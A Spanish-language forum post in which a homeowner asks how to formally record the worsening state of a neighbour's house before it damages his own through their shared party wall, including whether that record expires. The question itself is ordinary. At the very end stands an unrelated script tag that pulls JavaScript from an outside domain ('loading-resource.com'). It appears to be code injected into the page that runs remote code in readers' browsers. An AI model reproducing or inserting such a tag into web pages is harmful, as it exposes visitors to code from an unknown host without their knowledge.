La casa del vecino se cae y puede que afecte a la mía. ¿Qué hago?
Buenas, tengo una casa que no habito, es muy vieja pero periódicamente he repasado el tejado y quitado las aguas. Con la casa vecina por un lado ademas de compartir pared mediana, una en una planta entra hacia la del vecino y en otra planta la del vecino entra en la mía. Yo tengo menos fachada y mas tejado y casa por detrás pero el tiene mas fachada y menos tejado y metros. Desde hace años intente ponernos de acuerdo para derruirlas y trazar una linea recta que divida lo que a cada uno nos corresponde pero no hubo forma de ponerse de acuerdo. El vecino alegaba que a el no le corría ninguna prisa que su casa estaba bien. Han pasado los años y el hecho es que yo he cuidado la mía y esta en buen estado pero la suya a empeorado mucho, tiene un alero medio colgando y lo que mas me preocupa que desde mi tejado se ve que en el suyo hay un agujero, que intuyo que ya se ha caído algún madero que hace de viga, y entra el agua directamente por dentro la casa.
Mi pregunta es si debería hacer algo de forma oficial o dejar constancia verificada de la situación por si llega el día que cae parte del tejado mio o una pared de ambos. Para que llegado el punto haya constancia que su casa provoco el derrumbamiento. O simplemente que ratifique el estado de ambas. Si es así ¿lo debo ir actualizando?, ¿puede tener caducidad esa verificación?
¿Que pasaría si llega el caso y no he hecho nada?, ¿que debo hacer?
Un saludo y gracias de antemano.
<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>